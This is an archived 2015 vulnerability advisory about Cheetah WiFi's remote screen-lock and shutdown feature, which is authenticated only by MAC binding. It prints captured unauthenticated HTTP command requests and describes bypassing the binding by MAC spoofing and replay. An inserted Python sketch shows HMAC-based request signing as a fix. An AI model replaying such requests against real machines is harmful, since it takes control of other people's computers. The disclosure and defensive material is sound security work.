Cheetah WiFi: unauthenticated remote PC shutdown and screen lock - Vulnerability Warning - Black Bar Safety Net

2015-03-15T00:00:00
ID MYHACK58:62201559951
Type myhack58
Reporter Anonymous
Modified 2015-03-15T00:00:00

Description

Brief description:

When Cheetah WiFi runs a hotspot on a computer, one of its features lets a phone remotely shut down the computer and lock its screen. Authentication for this feature relies only on MAC address binding, so it can be bypassed by spoofing the MAC address.

Detailed description:


Wireshark packet capture:

POST /api/calltool?type=unlockscreen HTTP/1.1
Host: hi.liebao.cn:8735
Connection: keep-alive
Content-Length: 0
Origin: http://hi.liebao.cn:8735
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 7_1_2 like Mac OS X; zh-CN) AppleWebKit/537.51.1 (KHTML, like Gecko) Mobile/11D257 UCBrowser/10.1.0.518 Mobile
Accept: application/json
Accept-Language: zh-cn
Referer: http://hi.liebao.cn:8735/tool/
Accept-Encoding: gzip,deflate

HTTP/1.1 200 OK
Transfer-Encoding: chunked

C
{"code":"1"}
0

POST /api/calltool?type=lockscreen HTTP/1.1
Host: hi.liebao.cn:8735
Connection: keep-alive
Content-Length: 0
Origin: http://hi.liebao.cn:8735
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 7_1_2 like Mac OS X; zh-CN) AppleWebKit/537.51.1 (KHTML, like Gecko) Mobile/11D257 UCBrowser/10.1.0.518 Mobile
Accept: application/json
Accept-Language: zh-cn
Referer: http://hi.liebao.cn:8735/tool/
Accept-Encoding: gzip,deflate

HTTP/1.1 200 OK
Transfer-Encoding: chunked

C
{"code":"1"}
0

As the capture shows, the requests carry no encryption and no authentication.

However, the first time a command is used, the device binds the phone's MAC address.

By sniffing the command packets and MAC address sent by the legitimately bound phone, and then spoofing the same MAC address and sending the same command packets, an attacker can bypass the authentication and control the computer. The prerequisite is that the attacker has access to the WiFi.
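A sketch of how the command endpoint could authenticate requests instead of trusting the sender's MAC address, added here as an example and not taken from the Cheetah WiFi code. It assumes a per-phone secret shared out of band at pairing time and integer Unix timestamps; `sign_command`, `CommandVerifier` and `MAX_SKEW` are hypothetical names, while the path and `type` parameter come from the capture above.

```python
import hashlib
import hmac
import secrets
import time

MAX_SKEW = 30  # seconds a signed command stays valid (assumed policy)


def mac_binding_check(bound_mac, sender_mac):
    """Weak check from the advisory: trust the link-layer source address."""
    return sender_mac.lower() == bound_mac.lower()


def sign_command(secret, command, timestamp, nonce):
    """Phone side: HMAC over every field the server will act on."""
    msg = f"POST\n/api/calltool\ntype={command}\n{timestamp}\n{nonce}".encode()
    return hmac.new(secret, msg, hashlib.sha256).hexdigest()


class CommandVerifier:
    """PC side: accept a command only with a fresh, valid signature."""

    def __init__(self, secret):
        self.secret = secret
        self.seen = {}  # nonce -> timestamp, kept only inside the skew window

    def verify(self, command, timestamp, nonce, signature, now=None):
        now = time.time() if now is None else now
        if abs(now - timestamp) > MAX_SKEW:
            return False  # stale or future-dated request
        # Drop nonces so old that the timestamp check already rejects them.
        self.seen = {n: t for n, t in self.seen.items() if now - t <= MAX_SKEW}
        expected = sign_command(self.secret, command, timestamp, nonce)
        if not hmac.compare_digest(expected, signature):
            return False  # wrong secret, or command/timestamp/nonce altered
        if nonce in self.seen:
            return False  # same signed request delivered twice
        self.seen[nonce] = timestamp
        return True


if __name__ == "__main__":
    secret = secrets.token_bytes(32)  # constructed pairing secret
    server = CommandVerifier(secret)
    ts, nonce = int(time.time()), secrets.token_hex(8)
    sig = sign_command(secret, "lockscreen", ts, nonce)
    # Constructed MAC addresses: a copied address satisfies the weak check.
    print("weak check:", mac_binding_check("AA:BB:CC:00:11:22", "aa:bb:cc:00:11:22"))
    print("first delivery:", server.verify("lockscreen", ts, nonce, sig))
    print("second delivery:", server.verify("lockscreen", ts, nonce, sig))
```

This covers authenticity and replay only; the commands still travel in cleartext unless the hotspot's web service also uses TLS.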

Vulnerability proof:
